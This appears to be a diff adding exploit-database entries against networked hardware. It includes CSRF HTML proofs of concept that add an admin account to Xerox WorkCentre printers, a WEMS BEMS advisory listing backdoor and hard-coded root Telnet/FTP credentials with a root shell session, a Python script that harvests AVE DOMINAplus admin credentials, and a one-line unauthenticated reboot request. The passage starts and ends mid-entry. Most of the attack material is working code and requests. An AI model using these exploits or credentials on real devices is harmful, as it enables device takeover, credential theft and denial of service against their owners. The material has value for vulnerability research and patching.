+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware.
+# A request to add users is made in the Device User Database form field. This request is captured by
+# the proxy. And a CSRF PoC HTML file is prepared. Xerox WorkCentre® 6655 printers allow CSRF. A request
+# to add users is made in the Device User Database form field to the xerox.set URI. 
+# (The frmUserName value must have a unique name.)
+
+
+HTTP POST Request :
+
+POST /dummypost/xerox.set HTTP/1.1
+Host: server
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 494
+Origin: https://server
+Connection: close
+Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
+Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
+Upgrade-Insecure-Requests: 1
+
+CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
+
+HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Wed, 18 Dec 2019 22:09:40 GMT
+Server: Apache
+Connection: close
+Content-Type: text/html
+Content-Length: 13518
+
+CSRF HTML PoC :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="https://server/dummypost/xerox.set" method="POST">
+      <input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" />
+      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" />
+      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" />
+      <input type="hidden" name="CcgenModule" value="UserEdit" />
+      <input type="hidden" name="isRoles" value="True" />
+      <input type="hidden" name="isPassword" value="True" />
+      <input type="hidden" name="isCreate" value="True" />
+      <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" />
+      <input type="hidden" name="limited" value="False" />
+      <input type="hidden" name="oid" value="0" />
+      <input type="hidden" name="userName" value="ismailtasdelen" />
+      <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" />
+      <input type="hidden" name="newPassword" value="Test1234" />
+      <input type="hidden" name="retypePassword" value="Test1234" />
+      <input type="hidden" name="role" value="2" />
+      <input type="hidden" name="role" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47815.txt b/exploits/hardware/webapps/47815.txt
new file mode 100644
index 000000000..68feffb45
--- /dev/null
+++ b/exploits/hardware/webapps/47815.txt
@@ -0,0 +1,72 @@
+# Exploit Title: XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin)
+# Date: 2018-12-19 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.xerox.com/
+# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series/
+# Software : Xerox Printer
+# Product Version: WorkCentre® 7855
+# Vulernability Type : Cross-Site Request Forgery (Add Admin)
+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# The CSRF vulnerability was discovered in the WorkCentre® 7855 printer model of Xerox printer hardware.
+# A request to add users is made in the Device User Database form field. This request is captured by
+# the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7855 printers allow CSRF. A request
+# to add users is made in the Device User Database form field to the xerox.set URI. 
+# (The frmUserName value must have a unique name.)
+
+HTTP POST Request :
+
+POST /dummypost/xerox.set HTTP/1.1
+Host: server
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 494
+Origin: http://server
+Connection: close
+Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
+Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=04dc6361e94c451ff4d7d1d3ef8e32cd; WebTimerPopupID=12; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000001000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
+Upgrade-Insecure-Requests: 1
+
+CSRFToken=67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
+
+HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Thu, 19 Dec 2019 05:13:19 GMT
+Server: Apache
+Connection: close
+Content-Type: text/html
+Content-Length: 11947
+
+CSRF HTML PoC :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://server/dummypost/xerox.set" method="POST">
+      <input type="hidden" name="CSRFToken" value="67a23ff66bbdd5a1cdb95afa3a677807d74a5d74e2c1d55c576008e0a0399738b55e54353be4b069a3e68c761350654aa7e27fdcbfb9b43148aa3a1f6e8e5f7b" />
+      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" />
+      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" />
+      <input type="hidden" name="CcgenModule" value="UserEdit" />
+      <input type="hidden" name="isRoles" value="True" />
+      <input type="hidden" name="isPassword" value="True" />
+      <input type="hidden" name="isCreate" value="True" />
+      <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" />
+      <input type="hidden" name="limited" value="False" />
+      <input type="hidden" name="oid" value="0" />
+      <input type="hidden" name="userName" value="ismailtasdelen" />
+      <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" />
+      <input type="hidden" name="newPassword" value="Test1234" />
+      <input type="hidden" name="retypePassword" value="Test1234" />
+      <input type="hidden" name="role" value="2" />
+      <input type="hidden" name="role" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47816.txt b/exploits/hardware/webapps/47816.txt
new file mode 100644
index 000000000..a9cf59cda
--- /dev/null
+++ b/exploits/hardware/webapps/47816.txt
@@ -0,0 +1,72 @@
+# Exploit Title: XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin)
+# Date: 2018-12-19 
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.xerox.com/
+# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7800-series
+# Software : Xerox Printer
+# Product Version: WorkCentre® 7830
+# Vulernability Type : Cross-Site Request Forgery (Add Admin)
+# Vulenrability : Cross-Site Request Forgery
+# CVE : N/A
+
+# Description :
+# The CSRF vulnerability was discovered in the WorkCentre® 7830 printer model of Xerox printer hardware.
+# A request to add users is made in the Device User Database form field. This request is captured by
+# the proxy. And a CSRF PoC HTML file is prepared. WorkCentre® 7830 printers allow CSRF. A request
+# to add users is made in the Device User Database form field to the xerox.set URI. 
+# (The frmUserName value must have a unique name.)
+
+HTTP POST Request :
+
+POST /dummypost/xerox.set HTTP/1.1
+Host: server
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 494
+Origin: http://server
+Connection: close
+Referer: http://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
+Cookie: PageToShow=; statusSelected=n1; statusNumNodes=8; PHPSESSID=6524448254c9d6d6de52fe4a1085b994; WebTimerPopupID=5; propSelected=n30; propNumNodes=115; propHierarchy=00010000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
+Upgrade-Insecure-Requests: 1
+
+CSRFToken=078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
+
+HTTP Response :
+
+HTTP/1.1 200 OK
+Date: Thu, 19 Dec 2019 05:34:36 GMT
+Server: Apache
+Connection: close
+Content-Type: text/html
+Content-Length: 15022
+
+CSRF HTML PoC :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://server/dummypost/xerox.set" method="POST">
+      <input type="hidden" name="CSRFToken" value="078992ef7d70f5868c7bb9e99d5ed4c3a388351c1951bc033b392703df1e7121d1a4c0161b987721fdb8c4ee0cfda6e0be172a51d018c10ebf4b4f554b9d2708" />
+      <input type="hidden" name="&#95;fun&#95;function" value="HTTP&#95;Set&#95;ccgen&#95;fac&#95;dispatch&#95;fn" />
+      <input type="hidden" name="NextPage" value="&#47;properties&#47;authentication&#47;UserManager&#46;php&#63;x&#61;&sort&#61;Fname&order&#61;Up" />
+      <input type="hidden" name="CcgenModule" value="UserEdit" />
+      <input type="hidden" name="isRoles" value="True" />
+      <input type="hidden" name="isPassword" value="True" />
+      <input type="hidden" name="isCreate" value="True" />
+      <input type="hidden" name="rolesStr" value="2&#44;5&#44;1&#44;" />
+      <input type="hidden" name="limited" value="False" />
+      <input type="hidden" name="oid" value="0" />
+      <input type="hidden" name="userName" value="ismailtasdelen" />
+      <input type="hidden" name="friendlyName" value="Ismail&#32;Tasdelen" />
+      <input type="hidden" name="newPassword" value="Test1234" />
+      <input type="hidden" name="retypePassword" value="Test1234" />
+      <input type="hidden" name="role" value="2" />
+      <input type="hidden" name="role" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47817.txt b/exploits/hardware/webapps/47817.txt
new file mode 100644
index 000000000..2eb11fc9d
--- /dev/null
+++ b/exploits/hardware/webapps/47817.txt
@@ -0,0 +1,211 @@
+# Exploit: WEMS BEMS 21.3.1 - Undocumented Backdoor Account
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: WEMS Limited
+# Product web page: https://www.wems.co.uk
+# Advisory ID: ZSL-2019-5552
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php
+
+WEMS BEMS 21.3.1 Undocumented Backdoor Account
+
+
+Vendor: WEMS Limited
+Product web page: https://www.wems.co.uk
+Affected version: Web: 21.3.1
+                  Web: 20.0beta
+                  Web: 19.5
+                  Web: 18.4
+                  Firmware: 1.26.6 (OS: 5.3)
+                  Firmware: 1.23.7 (OS: 5.0)
+                  Firmware: 1.21.4 (OS: 4.1a-usb)
+                  Firmware: 1.18.0.3 (OS: i686-1.1)
+Platform: Shockwave Flash (SWF) / CGI
+
+Summary: We (WEMS) offer the world's first fully wireless energy management system.
+Our solution enables your organization to take control of its energy costs, by monitoring
+lighting, heating and air conditioning equipment to identify wastage across multiple
+sites and start saving money instantly. Additionally, we offer a service which enables
+you to personally control the settings of your building - remotely, via text messaging
+and the internet - from wherever you happen to be in the world.
+
+Desc: The wireless BMS solution has an undocumented backdoor account that is Base64-encoded.
+These sets of credentials are never exposed to the end-user and cannot be changed through
+any normal operation of the controller thru the RMI. Attacker could exploit this vulnerability
+by logging in using the backdoor account with highest privileges for administration and gain
+full system control. The check_users.sh Bash script is used to generate the default accounts
+on the system with their passwords and privilege level. The backdoor user cannot be seen in
+the users settings in the admin panel and it also uses an undocumented privilege level 3 when
+using the addhttpuser program which allows full availability of the features that the WEMS
+is offering remotely. WEMS also ships with hard-coded and weak credentials for Telnet/FTP
+access using the credentials gast:glasshou or root:glasshou.
+
+Tested on: Linux 2.6.16 armv5tejl
+           thttpd/2.25b
+           Adam 7000 System
+           WEMS OS 5.3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5552
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5552.php
+
+
+06.07.2019
+
+--
+
+
+Excerpt content of check_users.sh bash script:
+----------------------------------------------
+
+# cat /tmp/check_users.sh
+...
+...
+if [ -n "${varSystem}" ];then
+  #add 'V.A.R.' user credentials
+  /mnt/bin/addhttpuser -u var -p 88fRK66Q -l 2 > /dev/null
+  /mnt/bin/addhttpuser -u varuser -p user -l 1 > /dev/null
+  /mnt/bin/addhttpuser -u varview -p view -l 0 > /dev/null
+else
+  #add 'wems' user credentials
+  /mnt/bin/addhttpuser -u wems -p kup5EF4s -l 2 > /dev/null
+  /mnt/bin/addhttpuser -u wemsuser -p user -l 1 > /dev/null
+  /mnt/bin/addhttpuser -u wemsview -p view -l 0 > /dev/null
+fi
+
+echo "Adding logging user credentials..."
+/mnt/bin/addhttpuser -u YWRhbWNvbGxlY3Q -p YzAxMTNjdGFkYW0K -l 3 > /dev/null
+
+# Verify user added successfully...
+if [ "$?" -eq "255" ]
+then
+        echo "Error when adding logging user credentials - aborting.."
+        cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
+        exit
+fi
+
+veri_user=`grep -e 'YWRhbWNvbGxlY3Q' /mnt/etc/httpusers`
+
+if [ -n "$veri_user" ]
+then
+        echo "User credentials added successfully."
+        cp -p /mnt/etc/httpusers /mnt/etc/httpusers.default
+        exit
+else
+        echo "Error when adding user credentials - restoring defaults."
+        cp -p /mnt/etc/httpusers.default /mnt/etc/httpusers
+fi
+----------------------------------------------
+
+
+Default and hard-coded credentials:
+-----------------------------------
+
+WEMS:
+ 
+ [Level 2/Admin - Web/SWF->CGI]     : wems:kup5EF4s
+ [Level 1/User - Web/SWF->CGI]      : wemsuser:user
+ [Level 0/View - Web/SWF->CGI]      : wemsview:view
+ [Level 3/Backdoor - Web/SWF->CGI]  : YWRhbWNvbGxlY3Q:YzAxMTNjdGFkYW0K (adamcollect:c0113ctadam)
+
+V.A.R. (Value Added Reseller):
+
+ [Level 2/Admin - Web/SWF->CGI]     : var:88fRK66Q
+ [Level 1/User - Web/SWF->CGI]      : varuser:user
+ [Level 0/View - Web/SWF->CGI]      : varview:view
+
+Shell:
+
+ [Level 500/User - Telnet/FTP]      : gast:glasshou
+ [Level 0/root - Telnet/FTP]        : root:glasshou
+-----------------------------------
+
+
+By calling the auth command through the cmd parameter, the cgiauth binary
+reads the /mnt/etc/httpusers file and checks validation for authentication.
+To login with the backdoor account the following HTTP GET request is made:
+--------------------------------------------------------------------------
+
+GET /cgi-bin/cgiauth?user=YWRhbWNvbGxlY3Q&pass=YzAxMTNjdGFkYW0K&cmd=auth HTTP/1.1
+Host: 192.168.1.17
+User-Agent: Noproblem/25.1
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer: http://192.168.1.17/SMARThome1.swf
+
+Response observed:
+
+HTTP/1.1 200 OK
+content-type: text/html
+Transfer-Encoding: chunked
+Date: Fri, 13 Sep 2019 18:15:17 GMT
+Server: WEMS OS 5.0 Casino
+
+sessionid=EQhaZPEXgJQhkXeZ&level=3&username=YWRhbWNvbGxlY3Q
+
+
+--------------------------------------------------------------------------
+
+
+Running addhttpuser, reading httpusers file:
+--------------------------------------------
+
+# /mnt/bin/addhttpuser
+Usage is -u <username> -p <password> -l <level>
+# cat /mnt/etc/httpusers
+0:wems:$1$3EVBJ96F$RBX7xggVT8.zXM9vDbGWB/:2
+1:wemsuser:$1$3EVBJA6F$Gr6zU7L0n4OPq7YdCM5.b1:1
+2:wemsview:$1$3EVBJB6F$6XtYBc2VaQYucRe2T7lfa.:0
+3:YWRhbWNvbGxlY3Q:$1$3EVBJD6F$scO5furQud3eKLHpNyUyo.:3
+# ls -al /mnt/bin/addhttpuser
+-rwxr-xr-x    1 root     root        16520 Jan 29  2014 /mnt/bin/addhttpuser
+--------------------------------------------
+
+
+Root shell:
+-----------
+
+$ telnet 192.168.1.17
+Connected to 192.168.1.17.
+Escape character is '^]'.
+
+- Adam 7000 System - Version 4.1a-usb -
+
+WEMS login: gast
+Password: 
+
+
+BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+
+$ id
+uid=500(gast) gid=500
+$ su
+Password: 
+
+
+BusyBox v1.01 (2011.02.24-11:55+0000) Built-in shell (ash)
+Enter 'help' for a list of built-in commands.
+
+# id
+uid=0(root) gid=0(root)
+# netstat -nat
+Active Internet connections (servers and established)
+Proto Recv-Q Send-Q Local Address           Foreign Address         State
+tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
+tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
+tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
+-----------
+
+
+$ ftp 192.168.1.17
+WEMS FTP server (Version wu-2.6.2(12) Thu Feb 24 14:48:47 GMT 2011) ready.
+user root
+331 Password required for root.
+pass glasshou
+230 User root logged in.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47819.txt b/exploits/hardware/webapps/47819.txt
new file mode 100644
index 000000000..5f6804a7c
--- /dev/null
+++ b/exploits/hardware/webapps/47819.txt
@@ -0,0 +1,115 @@
+# Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: AVE S.p.A.
+# Product web page: https://www.ave.it | https://www.domoticaplus.it
+# Affected version: Web Server Code 53AB-WBS - 1.10.62
+# Advisory ID: ZSL-2019-5550
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
+
+#!/usr/bin/env python
+#
+#
+# AVE DOMINAplus <=1.10.x Credentials Disclosure Exploit
+#
+#
+# Vendor: AVE S.p.A.
+# Product web page: https://www.ave.it | https://www.domoticaplus.it
+# Affected version: Web Server Code 53AB-WBS - 1.10.62
+#                   Touch Screen Code TS01 - 1.0.65
+#                   Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
+#                   Touch Screen Code TS05 - 1.10.36
+#                   Models: 53AB-WBS
+#                           TS01
+#                           TS03V
+#                           TS04X-V
+#                           TS05N-V
+#                   App version: 1.10.77
+#                   App version: 1.10.65
+#                   App version: 1.10.64
+#                   App version: 1.10.62
+#                   App version: 1.10.60
+#                   App version: 1.10.52
+#                   App version: 1.10.52A
+#                   App version: 1.10.49
+#                   App version: 1.10.46
+#                   App version: 1.10.45
+#                   App version: 1.10.44
+#                   App version: 1.10.35
+#                   App version: 1.10.25
+#                   App version: 1.10.22
+#                   App version: 1.10.11
+#                   App version: 1.8.4
+#                   App version: TS1-1.0.65
+#                   App version: TS1-1.0.62
+#                   App version: TS1-1.0.44
+#                   App version: TS1-1.0.10
+#                   App version: TS1-1.0.9
+#
+# Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
+# Designed to revolutionize your concept of living. DOMINA plus is the AVE home
+# automation proposal that makes houses safer, more welcoming and optimized. In
+# fact, our home automation system introduces cutting-edge technologies, designed
+# to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
+# and security and offers advanced supervision tools in order to learn how to evaluate
+# and reduce consumption through various solutions dedicated to energy saving.
+#
+# Desc: The application suffers from clear-text credentials disclosure vulnerability
+# that allows an unauthenticated attacker to issue a request to an unprotected directory
+# that hosts an XML file '/xml/authClients.xml' and obtain administrative login information
+# that allows for a successful authentication bypass attack.
+#
+# Default credentials: admin:password
+# Configuration and camera credentials disclosure: /xml/tsconf.xml
+#
+# ==================================================
+# root@kali:~/domina# ./poc.py http://192.168.1.10
+#
+# Ze microfilm:
+# -------------
+# Username: arnoldcontrol
+# Password: P1sD0nt5pYMe
+# ==================================================
+#
+# Tested on: GNU/Linux 4.1.19-armv7-x7
+#            GNU/Linux 3.8.13-bone50/bone71.1/bone86
+#            Apache/2.4.7 (Ubuntu)
+#            Apache/2.2.22 (Debian)
+#            PHP/5.5.9-1ubuntu4.23
+#            PHP/5.4.41-0+deb7u1
+#            PHP/5.4.36-0+deb7u3
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5550
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5550.php
+#
+#
+# 06.10.2019
+#
+
+import sys,re
+import xml.etree.ElementTree as XML
+
+from urllib2 import Request,urlopen
+
+if (len(sys.argv) <= 1):
+    print '[*] Usage: poc.py http://ip:port'
+    exit(0)
+
+host = sys.argv[1]
+headers = {'Accept': 'application/xml'}
+request = Request(host+'/xml/authClients.xml', headers=headers)
+print '\nZe microfilm:'
+print '-------------'
+xml = urlopen(request).read()
+tree = XML.fromstring(xml)
+
+for user in tree.findall('customer'):
+    print 'Username: ',user.get('plantCode')
+
+for pwd in tree.iter('password'):
+    print 'Password: '+pwd.text+'\n'
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47820.txt b/exploits/hardware/webapps/47820.txt
new file mode 100644
index 000000000..ad0cb1069
--- /dev/null
+++ b/exploits/hardware/webapps/47820.txt
@@ -0,0 +1,79 @@
+# Exploit: AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: AVE S.p.A.
+# Product web page: https://www.ave.it | https://www.domoticaplus.it
+# Affected version: Web Server Code 53AB-WBS - 1.10.62
+# Advisory ID: ZSL-2019-5548
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php
+
+AVE DOMINAplus <=1.10.x Unauthenticated Remote Reboot
+
+
+Vendor: AVE S.p.A.
+Product web page: https://www.ave.it | https://www.domoticaplus.it
+Affected version: Web Server Code 53AB-WBS - 1.10.62
+                  Touch Screen Code TS01 - 1.0.65
+                  Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
+                  Touch Screen Code TS05 - 1.10.36
+                  Models: 53AB-WBS
+                          TS01
+                          TS03V
+                          TS04X-V
+                          TS05N-V
+                  App version: 1.10.77
+                  App version: 1.10.65
+                  App version: 1.10.64
+                  App version: 1.10.62
+                  App version: 1.10.60
+                  App version: 1.10.52
+                  App version: 1.10.52A
+                  App version: 1.10.49
+                  App version: 1.10.46
+                  App version: 1.10.45
+                  App version: 1.10.44
+                  App version: 1.10.35
+                  App version: 1.10.25
+                  App version: 1.10.22
+                  App version: 1.10.11
+                  App version: 1.8.4
+                  App version: TS1-1.0.65
+                  App version: TS1-1.0.62
+                  App version: TS1-1.0.44
+                  App version: TS1-1.0.10
+                  App version: TS1-1.0.9
+
+Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
+Designed to revolutionize your concept of living. DOMINA plus is the AVE home
+automation proposal that makes houses safer, more welcoming and optimized. In
+fact, our home automation system introduces cutting-edge technologies, designed
+to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
+and security and offers advanced supervision tools in order to learn how to
+evaluate and reduce consumption through various solutions dedicated to energy
+saving.
+
+Desc: The application suffers from an unauthenticated reboot command execution.
+Attackers can exploit this issue to cause a denial of service scenario.
+
+Tested on: GNU/Linux 4.1.19-armv7-x7
+           GNU/Linux 3.8.13-bone50/bone71.1/bone86
+           Apache/2.4.7 (Ubuntu)
+           Apache/2.2.22 (Debian)
+           PHP/5.5.9-1ubuntu4.23
+           PHP/5.4.41-0+deb7u1
+           PHP/5.4.36-0+deb7u3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5548
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php
+
+
+06.10.2019
+
+--
+
+curl -sk https://192.168.1.10/restart.php >/dev/null
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47821.txt b/exploits/hardware/webapps/47821.txt
new file mode 100644
index 000000000..dc49a98ea
--- /dev/null
+++ b/exploits/hardware/webapps/47821.txt
@@ -0,0 +1,108 @@
+# Exploit: AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)
+# Date: 2019-12-30
+# Author: LiquidWorm
+# Vendor: AVE S.p.A.
+# Product web page: https://www.ave.it | https://www.domoticaplus.it
+# Affected version: Web Server Code 53AB-WBS - 1.10.62
+# Advisory ID: ZSL-2019-5547
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php
+
+AVE DOMINAplus <=1.10.x CSRF/XSS Vulnerabilities
+
+
+Vendor: AVE S.p.A.
+Product web page: https://www.ave.it | https://www.domoticaplus.it
+Affected version: Web Server Code 53AB-WBS - 1.10.62
+                  Touch Screen Code TS01 - 1.0.65
+                  Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
+                  Touch Screen Code TS05 - 1.10.36
+                  Models: 53AB-WBS
+                          TS01
+                          TS03V
+                          TS04X-V
+                          TS05N-V
+                  App version: 1.10.77
+                  App version: 1.10.65
+                  App version: 1.10.64
+                  App version: 1.10.62
+                  App version: 1.10.60
+                  App version: 1.10.52
+                  App version: 1.10.52A
+                  App version: 1.10.49
+                  App version: 1.10.46
+                  App version: 1.10.45
+                  App version: 1.10.44
+                  App version: 1.10.35
+                  App version: 1.10.25
+                  App version: 1.10.22
+                  App version: 1.10.11
+                  App version: 1.8.4
+                  App version: TS1-1.0.65
+                  App version: TS1-1.0.62
+                  App version: TS1-1.0.44
+                  App version: TS1-1.0.10
+                  App version: TS1-1.0.9
+
+Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
+Designed to revolutionize your concept of living. DOMINA plus is the AVE home
+automation proposal that makes houses safer, more welcoming and optimized. In
+fact, our home automation system introduces cutting-edge technologies, designed
+to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
+and security and offers advanced supervision tools in order to learn how to
+evaluate and reduce consumption through various solutions dedicated to energy
+saving.
+
+Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The
+application allows users to perform certain actions via HTTP requests without
+performing any validity checks to verify the requests. This can be exploited
+to perform certain actions with administrative privileges if a logged-in user
+visits a malicious web site. Input passed to several GET/POST parameters is not
+properly sanitised before being returned to the user. This can be exploited to
+execute arbitrary HTML and script code in a user's browser session in context
+of an affected site.
+
+Tested on: GNU/Linux 4.1.19-armv7-x7
+           GNU/Linux 3.8.13-bone50/bone71.1/bone86
+           Apache/2.4.7 (Ubuntu)
+           Apache/2.2.22 (Debian)
+           PHP/5.5.9-1ubuntu4.23
+           PHP/5.4.41-0+deb7u1
+           PHP/5.4.36-0+deb7u3
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5547
